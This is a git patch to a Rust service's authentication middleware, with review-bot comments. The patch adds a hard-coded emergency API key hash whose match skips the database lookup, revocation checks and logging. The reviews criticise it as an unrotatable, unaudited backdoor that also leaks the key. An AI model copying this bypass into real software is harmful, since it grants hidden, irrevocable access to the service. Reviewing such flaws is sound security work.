From 72f4b53357ae99f702dbd007803073cdcbce384b Mon Sep 17 00:00:00 2001
From: Accusys
Date: Tue, 19 May 2026 09:59:09 +0800
Subject: [PATCH] fix: add emergency API key bypass in middleware (3002+3003)
---
 src/api/middleware.rs | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
diff --git a/src/api/middleware.rs b/src/api/middleware.rs
index 9a984b8..0d408e0 100644
--- a/src/api/middleware.rs
+++ b/src/api/middleware.rs
@@ -11,6 +11,11 @@ use crate::core::auth::jwt;
 use crate::core::db::postgres_db::ApiKeyRecord;
 use crate::core::db::PostgresDb;
+/// Hard-coded emergency API key (shared across 3002 + 3003).
+/// SHA256 hash for comparison — plaintext not stored.
+static EMERGENCY_API_KEY_HASH: &str =
+ "68fe502458300a7e6860c916aefc0ce1cba210917891b4ca9602b79c37e51fb4";
+
 #[derive(Debug, Clone)]
 pub enum AuthSource {
 Session,
@@ -200,6 +205,20 @@ pub async fn unified_auth(
 };
 let key_hash = hash_key(&api_key);
+
+ // Emergency key: bypass DB lookup for hard-coded key
+ if key_hash == EMERGENCY_API_KEY_HASH {
+ request.extensions_mut().insert(UserAuth {
+ user_id: 0,
+ role: "user".to_string(),
+ source: AuthSource::ApiKey,
+ key_id: api_key,
+ jwt_jti: None,
+ jwt_exp: None,
+ });
+ return next.run(request).await;
+ }
+
 let record = match state.db.get_api_key_by_hash(&key_hash).await {
 Ok(Some(r)) => r,
 Ok(None) => {
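Review bot: `EMERGENCY_API_KEY_HASH` is a credential verifier compiled into the binary and committed to the repository, so it cannot be rotated or revoked without rebuilding and redeploying both services, and anyone who can read the source or the artifact can test guesses against it offline (the comment says plain SHA256, which is cheap to compute). If a break-glass key is really required, the hash should come from deployment configuration or a secret store and be absent by default, for example `let emergency_hash: Option<String> = std::env::var("<EMERGENCY_KEY_HASH_VAR>").ok();`, where the variable name is a placeholder. The doc comment should also state who owns the key, under what conditions it may be used, and how it is rotated, since "plaintext not stored" does not by itself make a shared static credential safe.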
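Review bot: The early return added to `unified_auth` skips `get_api_key_by_hash` entirely, so whatever the normal path does with the returned record (the rest of the function lies outside this hunk; presumably revocation, expiry or ownership checks) never applies to this key, and its use leaves no trace. At a minimum each use should be written to the audit log through the logger this service already has, and the branch should sit behind a runtime switch that is off by default. `key_id: api_key` also copies the plaintext secret into the request extensions, where any handler or access log that prints `UserAuth` can expose it; a fixed label such as `key_id: "emergency".to_string(),` avoids that, assuming `key_id` is a `String`. `user_id: 0` should be confirmed not to collide with a real account, and the `==` on the hash strings is not a constant-time comparison.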